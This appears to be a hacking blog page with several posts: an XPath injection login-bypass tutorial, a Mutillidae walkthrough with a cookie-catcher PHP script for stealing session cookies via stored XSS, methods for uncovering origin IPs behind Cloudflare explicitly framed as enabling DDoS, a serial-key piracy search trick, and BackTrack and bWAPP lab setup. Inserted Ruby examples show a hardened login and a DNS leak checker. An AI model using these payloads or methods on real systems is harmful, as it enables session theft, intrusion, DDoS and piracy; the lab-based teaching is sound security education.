Sunday, 3 May 2015

HOW TO FIND SERIAL KEYS FROM GOOGLE

Steps:
1) Go to google.com
2) Write the name of the software you want a key for and add 94FBR at the end.

Eg: if you want to find a key for IDM then write " IDM 94FBR " (without quotes)

3) Search it and you will find many sites with serial keys for that software.


XPATH INJECTION TUTORIAL


XPath is a language designed to operate on data described in XML. XPath injection allows an attacker to inject XPath elements into a query written in this language. Typical goals are to bypass authentication or to access information in an unauthorized manner.

We are going to learn with a simple example. Download the code from here and put it in your local server directory (the code was created by Amol Naik).

Sample XML document we are going to use:

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-

Browse to the login.php page; here we can see a simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. Because the username and password are pasted straight into the XPath predicate, a single quote in the input closes the string literal and the rest of the input becomes part of the expression. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
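To make the bypass concrete, here is an added example that is not part of the tutorial or of Amol Naik's code. It is written in Ruby with the standard-library REXML XPath engine over a copy of the Employees document above. login_vulnerable builds the query by string concatenation, which is assumed to mirror what the vulnerable login.php does; login_hardened shows one mitigation: XPath 1.0 has no bind parameters, so the username is checked against a strict allowlist before it reaches the expression, and the password is compared in application code rather than inside the query. The function names, the allowlist and the hardened design are my assumptions, not the project's.

```ruby
require "rexml/document"

# Constructed copy of the tutorial's Employees document (same records as above).
EMPLOYEES_XML = <<~XML
  <Employees>
    <Employee ID="1"><UserName>jbravo</UserName><Password>test123</Password><Type>Admin</Type></Employee>
    <Employee ID="2"><UserName>mbrown</UserName><Password>demopass</Password><Type>User</Type></Employee>
    <Employee ID="3"><UserName>wgates</UserName><Password>MSRocks!</Password><Type>User</Type></Employee>
    <Employee ID="4"><UserName>cdawes</UserName><Password>letmein</Password><Type>User</Type></Employee>
  </Employees>
XML
DOC = REXML::Document.new(EMPLOYEES_XML)

# Vulnerable pattern (assumed to mirror login.php): user input is pasted into
# the XPath expression, so a quote in the input rewrites the predicate.
# Returns the UserName of every Employee node the query matches.
def login_vulnerable(user, pass)
  expr = "//Employee[UserName='#{user}' and Password='#{pass}']"
  REXML::XPath.match(DOC, expr).map { |e| e.elements["UserName"].text }
end

# Hardened version (my mitigation, not the tutorial's code). XPath 1.0 has no
# bind parameters, so: (1) reject any username outside a strict allowlist,
# which keeps quotes and XPath operators out of the expression entirely, and
# (2) keep the password out of the query and compare it in application code.
USERNAME_RE = /\A[a-z0-9_]{1,32}\z/

def login_hardened(user, pass)
  return nil unless user.is_a?(String) && user.match?(USERNAME_RE)
  node = REXML::XPath.first(DOC, "//Employee[UserName='#{user}']")
  return nil if node.nil?
  # Real code stores a password hash and compares in constant time; the plain
  # comparison here only mirrors the tutorial's cleartext document.
  node.elements["Password"].text == pass ? node.elements["UserName"].text : nil
end

if __FILE__ == $PROGRAM_NAME
  payload = "' or '1'='1"                   # the input from the tutorial
  p login_vulnerable("jbravo", "test123")   # ["jbravo"]
  p login_vulnerable(payload, payload)      # every employee: the predicate is always true
  p login_hardened(payload, payload)        # nil: rejected before the query is built
  p login_hardened("jbravo", "test123")     # "jbravo"
end
```

With the tutorial's input the vulnerable predicate reads `UserName='' or '1'='1' and Password='' or '1'='1'`; since `and` binds tighter than `or`, the trailing `'1'='1'` makes it true for every Employee node, and the application logs in the first one returned, here the Admin. The hardened function never lets that string reach the XPath engine.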


Broken Authentication and Session Management is number 2 in the OWASP Top 10 2013 list. In Mutillidae it contains three subsections:

Authentication Bypass
Privilege Escalation
Username Enumeration

We have already covered username enumeration in the last article, where we obtained a list of valid usernames that exist in the database. Today we are going to use the authentication bypass methods:

Using cookie
Using brute-force
Using SQL injection
(1) Authentication Bypass Using Cookie:-
As we know, Mutillidae is vulnerable to XSS, so we can capture cookies with the help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

The link above is vulnerable to persistent XSS. We can submit HTML in the add-to-blog section, so we are going to use a cookie catcher.

Content of cookie_catcher.php :-

<?php
// Send the visitor on to another address so the request looks like a normal redirect.
header ("Location: http://192.168.56.1");
// The cookie value arrives in the "c" query parameter.
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv ('HTTP_REFERER');
// Append one HTML record per request to cookies.html.
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to a server. For the demo I used my local Apache server; after the script executes it redirects to 192.168.56.1. You can change the code according to your needs. It will grab the IP, cookie, referer, time and date.



HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?


All these methods rely on bad admin configuration, but such misconfigurations are still quite common.

If you want to find the real IP address of a website that is hidden behind CloudFlare: it has come to my attention that many booters, hosts, malicious websites and others use CloudFlare for DDoS protection and anti-abuse-report protection. With CloudFlare protection it is difficult to get the host's IP; therefore it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain the real IP of any website protected by CloudFlare.

METHOD 1:-

If you simply ping the domain, it will give an IP which is not the website's real IP address, because the record points at CloudFlare's edge. You should try the following options to get the real IP address of the domain; each is a hostname that administrators often leave pointing directly at the origin server.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a long-established domain you can use the Netcraft toolbar to check the IP it had before CloudFlare was put in front of it.

For example:

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly we can see the change in IP to a CloudFlare one.

METHOD 3 :-

You can try brute-forcing DNS; some subdomain may carry the real IP of the website.

For this purpose you need Nmap.

Open your terminal with root privileges and type the following command:

# nmap -sV -sS -F <target>

It will scan the host and give results; it does not give the real IP of the website (but from this you can tell whether the website is protected by CloudFlare or not).

Now type the following command in the terminal:

# nmap --script dns-brute -sn <target>

It will give you the real IP of the website if any brute-forced subdomain resolves to it.


I made a simple bash script which does all of this for you. For more details
click here.

If none of the above methods works, then there is no admin misconfiguration, so you cannot find the real IP.
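The flip side of the three methods is the check a site owner should run on a zone they administer: does any DNS record still point at the origin? Here is an added example in Ruby, not the post's own bash script, that resolves the domain and the hostname prefixes listed in method 1 and reports any record whose address falls outside Cloudflare's published IPv4 ranges. The CIDR list is copied from Cloudflare's published list (https://www.cloudflare.com/ips/) and should be refreshed from there; the sample records are constructed so the logic can be checked offline, and the function names are my own.

```ruby
require "ipaddr"
require "resolv"

# Cloudflare's published IPv4 edge ranges (https://www.cloudflare.com/ips/),
# copied at the time of writing; refresh from that page before relying on them.
CLOUDFLARE_V4 = %w[
  173.245.48.0/20 103.21.244.0/22 103.22.200.0/22 103.31.4.0/22
  141.101.64.0/18 108.162.192.0/18 190.93.240.0/20 188.114.96.0/20
  197.234.240.0/22 198.41.128.0/17 162.158.0.0/15 104.16.0.0/13
  104.24.0.0/14 172.64.0.0/13 131.0.72.0/22
].map { |cidr| IPAddr.new(cidr) }

# Hostname prefixes the post lists as commonly left pointing straight at the origin.
CANDIDATE_PREFIXES = %w[direct-connect direct ftp cpanel mail].freeze

# Constructed sample: one apex behind Cloudflare, two records that leak.
SAMPLE_RECORDS = {
  "example.com"      => ["104.16.1.1"],
  "mail.example.com" => ["203.0.113.7"],
  "ftp.example.com"  => ["172.64.0.5", "203.0.113.8"],
}.freeze

def cloudflare_ip?(ip)
  addr = IPAddr.new(ip)
  CLOUDFLARE_V4.any? { |net| net.include?(addr) }
end

# records: { "hostname" => ["ipv4", ...] }. Returns only the hosts that resolve
# to an address outside Cloudflare, i.e. the DNS entries exposing the origin.
def origin_leaks(records)
  records.each_with_object({}) do |(host, ips), leaks|
    exposed = ips.reject { |ip| cloudflare_ip?(ip) }
    leaks[host] = exposed unless exposed.empty?
  end
end

# Live mode for a zone you administer: resolve the apex and the candidate names.
def resolve_candidates(domain)
  names = [domain] + CANDIDATE_PREFIXES.map { |p| "#{p}.#{domain}" }
  names.each_with_object({}) do |name, records|
    ips = Resolv.getaddresses(name).grep(Resolv::IPv4::Regex)
    records[name] = ips unless ips.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  records = ARGV.empty? ? SAMPLE_RECORDS : resolve_candidates(ARGV[0])
  leaks = origin_leaks(records)
  puts "no origin-exposing records found" if leaks.empty?
  leaks.each { |host, ips| puts "#{host} -> #{ips.join(', ')} (not a Cloudflare address)" }
end
```

Run it with no arguments to see the constructed sample (mail and ftp flagged, the apex clean), or with a domain you control to query live DNS. Anything it flags is a record to move behind the proxy or remove; the fix on the origin side is a firewall rule that only admits traffic from these same ranges, so a leaked address is not useful even if found.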


Monday, 23 February 2015

WHAT IS THE INTERNET?


The internet is a network of computers which spans the entire world.
The internet is a decentralized network; in other words, every computer connected to it is treated the same.
There are no special internet servers which control the whole internet, but some servers have a special role which we will discuss. Have a wonderful hacking day.

Thursday, 6 November 2014

how to install backtrack 5 in android


Install BackTrack on Android Mobile

What is BackTrack 5

BackTrack is a very popular Linux distribution for penetration testing. It has hundreds of tools for pentesting and hacking. BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to security auditing.


BackTrack includes many well known security tools including:
- Metasploit for integration
- RFMON, injection capable wireless drivers
- Aircrack-ng
- Gerix Wifi Cracker
- Kismet
- Nmap
- Ophcrack
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Hydra
- OWASP Mantra Security Framework, a collection of hacking tools, add-ons and scripts based on Firefox
- Cisco OCS Mass Scanner, a very reliable and fast scanner for Cisco routers with telnet and enabling of a default password.
- A large collection of exploits as well as more commonplace software such as browsers.

BackTrack arranges tools into 12 categories:
- Information gathering
- Vulnerability assessment
- Exploitation tools
- Privilege escalation
- Maintaining access
- Reverse engineering
- RFID tools
- Stress testing
- Forensics
- Reporting tools
- Services
- Miscellaneous

What you will need

- Backtrack 5 ARM
- Free space on the root of you device for backtrack 5
- A rooted device
- Busybox
- SuperUser
- Terminal Emulator

- AndroidVNC
First of all, all of these are free on Google Play.

First, download the compressed BackTrack ARM image for Android:
Backtrack-;armv.10 Download

Second, install ZArchiver to extract the compressed BackTrack image file: ZArchiver Download

OK, are you ready to install BackTrack on Android? Now install BusyBox; BusyBox is an installer and uninstaller Android program: Busybox Download

Now install Linux Installer; Linux Installer is the main application in this process:
Linux Installer Download
Open Linux Installer and click on the Launch button on your right side.


Click on Settings > Edit, then change the file path there to your BackTrack image, the .img file that you extracted.
Now you need a Terminal Emulator.
Terminal Emulator will open; you just have to proceed with the installation steps. It asks you for a new password and some preferences. When it's done you will get a red "root@localhost~#" prompt like the picture below:

You are now in BackTrack! Now if you want BackTrack in a GUI, go to Google Play and install Android VNC.
Open it when it finishes installing, and it will look like this.
Now let's run the BackTrack GUI with the VNC viewer:
startvnc

To connect with VNC we must know the port where VNC is listening. Run netstat -anpt and note the port where VNC is listening. In this case the port is 5901.

Open AndroidVNC and fill in the form like this:
Nickname : BT5
Password : toortoor
Address : 127.0.0.1
Port : 5901
Connect and you will see the BackTrack 5 interface :-)

You can download and install more Linux distributions by the same trick.
All Android Linux Distributions
Download Link


Thursday, 17 July 2014

Ethical Hacking Training with bWAPP Pentest lab


Hello buddies, after a short break I'm back with an interesting post on creating a pentesting lab with bWAPP. bWAPP is one of the cutest web pentesting labs for beginners to get started and learn web app hacking. I've written many penetration testing articles; this one is also a little amazing and helpful for noobs and beginners.


What is bWAPP?
bWAPP, or buggy web application, is a free and open source web application
built to allow security enthusiasts, students and developers to better secure web applications. It is for educational purposes only. bWAPP contains all types of OWASP Top 10 (2013) vulnerabilities.

bWAPP has many types of vulnerabilities, such as:

·         HTML, SQL, LDAP, XML, Get, Post, Cookies, Command etc Injection
·         Stored, Reflected, DOM, Get, Post etc Cross Site Scripting (XSS)
·         Broken Auth. & Session management
·         Forgot Password, Function, Insecure transport etc
·         Password attacks, Cookie Stealing, HTTP Management etc
·         Strong Session, Logout Management etc
·         Insecure Direct Object Reference
·         Cross Site Request Forgery (CSRF)
·         Security Misconfiguration 
·         Insecure Cryptographic Storage
·         Failure to Restrict URL Access
·         Insufficient Transport Layer Protection
·         Unvalidated Redirects and Forwards
Other bugs:
·         Client-Side Validation (Password)
·         Directory Traversal - Files
·         HTTP Response Splitting
·         Information Disclosure - Headers
·         PHP Eval Function
·         Remote & Local File Inclusion
·         Unrestricted File Upload



How to install bWAPP in Windows?
It is a little hard but very simple, haha; just complete the following requirements:

Requirements:
·         WAMP Server (30 MB download)
·         bWAPP Source Files (Download)
·         A little brain!
I'll not show any tutorial to install WAMP server, because it's very easy: download and install WAMP server on your system and start it.



·         Start learning from the first level to the last; it's totally free. Learn some basic HTTP and TCP/IP networking.
·         And soon I'm also going to post many ethical hacking methods.
Share it and feel free to comment; dare to ask. Knowledge is free. Sharing is caring.


about this blog


This blog is for educational purposes only. Hacking is a crime, but utilizing its knowledge for good purposes is not a crime.

You will get here all the tricks and much more of the knowledge you need at this blog.



by:pavan joshi

© 2013 computer tips and tricks with pavan joshi. WP Mythemeshop Converted by Bloggertheme9